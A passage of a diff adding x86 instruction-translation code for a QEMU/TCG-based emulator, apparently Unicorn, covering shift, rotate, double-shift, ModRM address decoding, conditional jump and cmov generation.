cpu_tmp3_i32; + } + + /* Conditionally store the CC_OP value. */ + z32 = tcg_const_i32(tcg_ctx, 0); + s32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, s32, count); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, cpu_cc_op, s32, z32, cpu_tmp2_i32, oldop); + tcg_temp_free_i32(tcg_ctx, z32); + tcg_temp_free_i32(tcg_ctx, s32); + + /* The CC_OP value is no longer predictable. */ + set_cc_op(s, CC_OP_DYNAMIC); +} + +static void gen_shift_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + int is_right, int is_arith) +{ + target_ulong mask = (ot == MO_64 ? 
0x3f : 0x1f); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], mask); + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, *cpu_T[1], 1); + + if (is_right) { + if (is_arith) { + gen_exts(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_sar_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_sar_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + } else { + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + gen_shift_flags(s, ot, *cpu_T[0], cpu_tmp0, *cpu_T[1], is_right); +} + +static void gen_shift_rm_im(DisasContext *s, TCGMemOp ot, int op1, int op2, + int is_right, int is_arith) +{ + int mask = (ot == MO_64 ? 
0x3f : 0x1f); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + else + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + + op2 &= mask; + if (op2 != 0) { + if (is_right) { + if (is_arith) { + gen_exts(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } else { + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shri_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + } else { + tcg_gen_shli_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], op2 - 1); + tcg_gen_shli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + /* update eflags if non zero shift */ + if (op2 != 0) { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, cpu_tmp4); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); + } +} + +static void gen_rot_rm_T1(DisasContext *s, TCGMemOp ot, int op1, int is_right) +{ + target_ulong mask = (ot == MO_64 ? 
0x3f : 0x1f); + TCGv_i32 t0, t1; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], mask); + + switch (ot) { + case MO_8: + /* Replicate the 8-bit input so that a 32-bit rotate works. */ + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_muli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0x01010101); + goto do_long; + case MO_16: + /* Replicate the 16-bit input so that a 32-bit rotate works. */ + tcg_gen_deposit_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[0], 16, 16); + goto do_long; + do_long: +#ifdef TARGET_X86_64 + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + if (is_right) { + tcg_gen_rotr_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + } else { + tcg_gen_rotl_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + } + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + break; +#endif + default: + if (is_right) { + tcg_gen_rotr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + tcg_gen_rotl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + break; + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + /* We'll need the flags computed into CC_SRC. */ + gen_compute_eflags(s); + + /* The value that was "rotated out" is now present at the other end + of the word. Compute C into CC_DST and O into CC_SRC2. Note that + since we've computed the flags into CC_SRC, these variables are + currently dead. 
*/ + if (is_right) { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask - 1); + tcg_gen_shri_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, cpu_cc_dst, 1); + } else { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], 1); + } + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, 1); + tcg_gen_xor_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, cpu_cc_dst); + + /* Now conditionally store the new CC_OP value. If the shift count + is 0 we keep the CC_OP_EFLAGS setting so that only CC_SRC is live. + Otherwise reuse CC_OP_ADCOX which have the C and O flags split out + exactly as we computed above. */ + t0 = tcg_const_i32(tcg_ctx, 0); + t1 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_tl_i32(tcg_ctx, t1, *cpu_T[1]); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, CC_OP_ADCOX); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp3_i32, CC_OP_EFLAGS); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, cpu_cc_op, t1, t0, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_temp_free_i32(tcg_ctx, t0); + tcg_temp_free_i32(tcg_ctx, t1); + + /* The CC_OP value is no longer predictable. */ + set_cc_op(s, CC_OP_DYNAMIC); +} + +static void gen_rot_rm_im(DisasContext *s, TCGMemOp ot, int op1, int op2, + int is_right) +{ + int mask = (ot == MO_64 ? 
0x3f : 0x1f); + int shift; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + +#ifdef TARGET_X86_64 + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; +#endif + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + op2 &= mask; + if (op2 != 0) { + switch (ot) { +#ifdef TARGET_X86_64 + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + if (is_right) { + tcg_gen_rotri_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, op2); + } else { + tcg_gen_rotli_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, op2); + } + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + break; +#endif + default: + if (is_right) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } else { + tcg_gen_rotli_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], op2); + } + break; + case MO_8: + mask = 7; + goto do_shifts; + case MO_16: + mask = 15; + do_shifts: + shift = op2 & mask; + if (is_right) { + shift = mask + 1 - shift; + } + gen_extu(tcg_ctx, ot, *cpu_T[0]); + tcg_gen_shli_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], shift); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], mask + 1 - shift); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + } + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + if (op2 != 0) { + /* Compute the flags into CC_SRC. */ + gen_compute_eflags(s); + + /* The value that was "rotated out" is now present at the other end + of the word. Compute C into CC_DST and O into CC_SRC2. Note that + since we've computed the flags into CC_SRC, these variables are + currently dead. 
*/ + if (is_right) { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask - 1); + tcg_gen_shri_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, cpu_cc_dst, 1); + } else { + tcg_gen_shri_tl(tcg_ctx, cpu_cc_src2, *cpu_T[0], mask); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], 1); + } + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, 1); + tcg_gen_xor_tl(tcg_ctx, cpu_cc_src2, cpu_cc_src2, cpu_cc_dst); + set_cc_op(s, CC_OP_ADCOX); + } +} + +/* XXX: add faster immediate = 1 case */ +static void gen_rotc_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + int is_right) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_compute_eflags(s); + assert(s->cc_op == CC_OP_EFLAGS); + + /* load */ + if (op1 == OR_TMP0) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + else + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + + if (is_right) { + switch (ot) { + case MO_8: + gen_helper_rcrb(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_16: + gen_helper_rcrw(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_32: + gen_helper_rcrl(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_helper_rcrq(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#endif + default: + tcg_abort(); + } + } else { + switch (ot) { + case MO_8: + gen_helper_rclb(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_16: + gen_helper_rclw(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_32: + gen_helper_rcll(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_helper_rclq(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#endif + default: + tcg_abort(); + } + } + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); +} + +/* XXX: add 
faster immediate case */ +static void gen_shiftd_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + bool is_right, TCGv count_in) +{ + target_ulong mask = (ot == MO_64 ? 63 : 31); + TCGv count; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + count = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, count, count_in, mask); + + switch (ot) { + case MO_16: + /* Note: we implement the Intel behaviour for shift count > 16. + This means "shrdw C, B, A" shifts A:B:A >> C. Build the B:A + portion by constructing it as a 32-bit value. */ + if (is_right) { + tcg_gen_deposit_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], *cpu_T[1], 16, 16); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[0], cpu_tmp0); + } else { + tcg_gen_deposit_tl(tcg_ctx, *cpu_T[1], *cpu_T[0], *cpu_T[1], 16, 16); + } + /* FALLTHRU */ +#ifdef TARGET_X86_64 + case MO_32: + /* Concatenate the two 32-bit values and use a 64-bit shift. 
*/ + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, count, 1); + if (is_right) { + tcg_gen_concat_tl_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_shr_i64(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shr_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + } else { + tcg_gen_concat_tl_i64(tcg_ctx, *cpu_T[0], *cpu_T[1], *cpu_T[0]); + tcg_gen_shl_i64(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shl_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shri_i64(tcg_ctx, cpu_tmp0, cpu_tmp0, 32); + tcg_gen_shri_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], 32); + } + break; +#endif + default: + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, count, 1); + if (is_right) { + tcg_gen_shr_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, mask + 1, count); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_tmp4); + } else { + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + if (ot == MO_16) { + /* Only needed if count > 16, for Intel behaviour. 
*/ + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, 33, count); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp4, *cpu_T[1], cpu_tmp4); + tcg_gen_or_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, cpu_tmp4); + } + + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, mask + 1, count); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_tmp4); + } + tcg_gen_movi_tl(tcg_ctx, cpu_tmp4, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_T[1], count, cpu_tmp4, + cpu_tmp4, *cpu_T[1]); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + break; + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + gen_shift_flags(s, ot, *cpu_T[0], cpu_tmp0, count, is_right); + tcg_temp_free(tcg_ctx, count); +} + +static void gen_shift(DisasContext *s1, int op, TCGMemOp ot, int d, int s) +{ + TCGContext *tcg_ctx = s1->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (s != OR_TMP1) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], s); + switch(op) { + case OP_ROL: + gen_rot_rm_T1(s1, ot, d, 0); + break; + case OP_ROR: + gen_rot_rm_T1(s1, ot, d, 1); + break; + case OP_SHL: + case OP_SHL1: + gen_shift_rm_T1(s1, ot, d, 0, 0); + break; + case OP_SHR: + gen_shift_rm_T1(s1, ot, d, 1, 0); + break; + case OP_SAR: + gen_shift_rm_T1(s1, ot, d, 1, 1); + break; + case OP_RCL: + gen_rotc_rm_T1(s1, ot, d, 0); + break; + case OP_RCR: + gen_rotc_rm_T1(s1, ot, d, 1); + break; + } +} + +static void gen_shifti(DisasContext *s, int op, TCGMemOp ot, int d, int c) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + switch(op) { + case OP_ROL: + gen_rot_rm_im(s, ot, d, c, 0); + break; + case OP_ROR: + gen_rot_rm_im(s, ot, d, c, 1); + break; + case OP_SHL: + case OP_SHL1: + gen_shift_rm_im(s, ot, d, c, 0, 0); + break; + case OP_SHR: + gen_shift_rm_im(s, ot, d, c, 1, 0); + break; + case OP_SAR: + gen_shift_rm_im(s, ot, d, c, 1, 1); + break; + default: + /* currently not optimized */ + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], c); + gen_shift(s, op, ot, d, OR_TMP1); + 
break; + } +} + +static void gen_lea_modrm(CPUX86State *env, DisasContext *s, int modrm) +{ + target_long disp; + int havesib; + int base; + int index; + int scale; + int mod, rm, code, override, must_add_seg; + TCGv sum; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + override = s->override; + must_add_seg = s->addseg; + if (override >= 0) + must_add_seg = 1; + mod = (modrm >> 6) & 3; + rm = modrm & 7; + + switch (s->aflag) { + case MO_64: + case MO_32: + havesib = 0; + base = rm; + index = -1; + scale = 0; + + if (base == 4) { + havesib = 1; + code = cpu_ldub_code(env, s->pc++); + scale = (code >> 6) & 3; + index = ((code >> 3) & 7) | REX_X(s); + if (index == 4) { + index = -1; /* no index */ + } + base = (code & 7); + } + base |= REX_B(s); + + switch (mod) { + case 0: + if ((base & 7) == 5) { + base = -1; + disp = (int32_t)cpu_ldl_code(env, s->pc); + s->pc += 4; + if (CODE64(s) && !havesib) { + disp += s->pc + s->rip_offset; + } + } else { + disp = 0; + } + break; + case 1: + disp = (int8_t)cpu_ldub_code(env, s->pc++); + break; + default: + case 2: + disp = (int32_t)cpu_ldl_code(env, s->pc); + s->pc += 4; + break; + } + + /* For correct popl handling with esp. */ + if (base == R_ESP && s->popl_esp_hack) { + disp += s->popl_esp_hack; + } + + /* Compute the address, with a minimum number of TCG ops. 
*/ + TCGV_UNUSED(sum); + if (index >= 0) { + if (scale == 0) { + sum = *cpu_regs[index]; + } else { + tcg_gen_shli_tl(tcg_ctx, cpu_A0, *cpu_regs[index], scale); + sum = cpu_A0; + } + if (base >= 0) { + tcg_gen_add_tl(tcg_ctx, cpu_A0, sum, *cpu_regs[base]); + sum = cpu_A0; + } + } else if (base >= 0) { + sum = *cpu_regs[base]; + } + if (TCGV_IS_UNUSED(sum)) { + tcg_gen_movi_tl(tcg_ctx, cpu_A0, disp); + } else { + tcg_gen_addi_tl(tcg_ctx, cpu_A0, sum, disp); + } + + if (must_add_seg) { + if (override < 0) { + if (base == R_EBP || base == R_ESP) { + override = R_SS; + } else { + override = R_DS; + } + } + + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUX86State, segs[override].base)); + if (CODE64(s)) { + if (s->aflag == MO_32) { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + return; + } + + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + } + + if (s->aflag == MO_32) { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + break; + + case MO_16: + switch (mod) { + case 0: + if (rm == 6) { + disp = cpu_lduw_code(env, s->pc); + s->pc += 2; + tcg_gen_movi_tl(tcg_ctx, cpu_A0, disp); + rm = 0; /* avoid SS override */ + goto no_rm; + } else { + disp = 0; + } + break; + case 1: + disp = (int8_t)cpu_ldub_code(env, s->pc++); + break; + default: + case 2: + disp = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + break; + } + + sum = cpu_A0; + switch (rm) { + case 0: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX], *cpu_regs[R_ESI]); + break; + case 1: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX], *cpu_regs[R_EDI]); + break; + case 2: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBP], *cpu_regs[R_ESI]); + break; + case 3: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBP], *cpu_regs[R_EDI]); + break; + case 4: + sum = *cpu_regs[R_ESI]; + break; + case 5: + sum = *cpu_regs[R_EDI]; + break; + case 6: + sum = *cpu_regs[R_EBP]; + break; + default: + case 7: + sum = *cpu_regs[R_EBX]; + break; 
+ } + tcg_gen_addi_tl(tcg_ctx, cpu_A0, sum, disp); + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + no_rm: + if (must_add_seg) { + if (override < 0) { + if (rm == 2 || rm == 3 || rm == 6) { + override = R_SS; + } else { + override = R_DS; + } + } + gen_op_addl_A0_seg(s, override); + } + break; + + default: + tcg_abort(); + } +} + +static void gen_nop_modrm(CPUX86State *env, DisasContext *s, int modrm) +{ + int mod, rm, base, code; + + mod = (modrm >> 6) & 3; + if (mod == 3) + return; + rm = modrm & 7; + + switch (s->aflag) { + case MO_64: + case MO_32: + base = rm; + + if (base == 4) { + code = cpu_ldub_code(env, s->pc++); + base = (code & 7); + } + + switch (mod) { + case 0: + if (base == 5) { + s->pc += 4; + } + break; + case 1: + s->pc++; + break; + default: + case 2: + s->pc += 4; + break; + } + break; + + case MO_16: + switch (mod) { + case 0: + if (rm == 6) { + s->pc += 2; + } + break; + case 1: + s->pc++; + break; + default: + case 2: + s->pc += 2; + break; + } + break; + + default: + tcg_abort(); + } +} + +/* used for LEA and MOV AX, mem */ +static void gen_add_A0_ds_seg(DisasContext *s) +{ + int override, must_add_seg; + must_add_seg = s->addseg; + override = R_DS; + if (s->override >= 0) { + override = s->override; + must_add_seg = 1; + } + if (must_add_seg) { +#ifdef TARGET_X86_64 + if (CODE64(s)) { + gen_op_addq_A0_seg(s->uc->tcg_ctx, override); + } else +#endif + { + gen_op_addl_A0_seg(s, override); + } + } +} + +/* generate modrm memory load or store of 'reg'. 
TMP0 is used if reg == + OR_TMP0 */ +static void gen_ldst_modrm(CPUX86State *env, DisasContext *s, int modrm, + TCGMemOp ot, int reg, int is_store) +{ + int mod, rm; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod == 3) { + if (is_store) { + if (reg != OR_TMP0) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + if (reg != OR_TMP0) + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + } else { + gen_lea_modrm(env, s, modrm); + if (is_store) { + if (reg != OR_TMP0) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + if (reg != OR_TMP0) + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + } +} + +static inline uint32_t insn_get(CPUX86State *env, DisasContext *s, TCGMemOp ot) +{ + uint32_t ret; + + switch (ot) { + case MO_8: + ret = cpu_ldub_code(env, s->pc); + s->pc++; + break; + case MO_16: + ret = cpu_lduw_code(env, s->pc); + s->pc += 2; + break; + case MO_32: +#ifdef TARGET_X86_64 + case MO_64: +#endif + ret = cpu_ldl_code(env, s->pc); + s->pc += 4; + break; + default: + tcg_abort(); + } + return ret; +} + +static inline int insn_const_size(TCGMemOp ot) +{ + if (ot <= MO_32) { + return 1 << ot; + } else { + return 4; + } +} + +static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong eip) +{ + TranslationBlock *tb; + target_ulong pc; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + pc = s->cs_base + eip; + tb = s->tb; + /* NOTE: we handle the case where the TB spans two pages here */ + if ((pc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) || + (pc & TARGET_PAGE_MASK) == ((s->pc - 1) & TARGET_PAGE_MASK)) { + /* jump to same page: we can use a direct jump */ + tcg_gen_goto_tb(tcg_ctx, tb_num); + gen_jmp_im(s, 
eip); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + tb_num); + } else { + /* jump to another page: currently not optimized */ + gen_jmp_im(s, eip); + gen_eob(s); + } +} + +static inline void gen_jcc(DisasContext *s, int b, + target_ulong val, target_ulong next_eip) +{ + int l1, l2; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + if (s->jmp_opt) { + l1 = gen_new_label(tcg_ctx); + gen_jcc1(s, b, l1); + + gen_goto_tb(s, 0, next_eip); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(s, 1, val); + s->is_jmp = DISAS_TB_JUMP; + } else { + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + gen_jcc1(s, b, l1); + + gen_jmp_im(s, next_eip); + tcg_gen_br(tcg_ctx, l2); + + gen_set_label(tcg_ctx, l1); + gen_jmp_im(s, val); + gen_set_label(tcg_ctx, l2); + gen_eob(s); + } +} + +static void gen_cmovcc1(CPUX86State *env, DisasContext *s, TCGMemOp ot, int b, + int modrm, int reg) +{ + CCPrepare cc; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + cc = gen_prepare_cc(s, b, *cpu_T[1]); + if (cc.mask != -1) { + TCGv t0 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t0, cc.reg, cc.mask); + cc.reg = t0; + } + if (!cc.use_reg2) { + cc.reg2 = tcg_const_tl(tcg_ctx, cc.imm); + } + + tcg_gen_movcond_tl(tcg_ctx, cc.cond, *cpu_T[0], cc.reg, cc.reg2, + *cpu_T[0], *cpu_regs[reg]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + + if (cc.mask != -1) { + tcg_temp_free(tcg_ctx, cc.reg); + } + if (!cc.use_reg2) { + tcg_temp_free(tcg_ctx, cc.reg2); + } +} + +static inline void gen_op_movl_T0_seg(TCGContext *s, int seg_reg) +{ + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_ld32u_tl(s, *cpu_T[0], s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].selector)); +} + +static inline void gen_op_movl_seg_T0_vm(TCGContext *s, int seg_reg) +{ + TCGv **cpu_T = 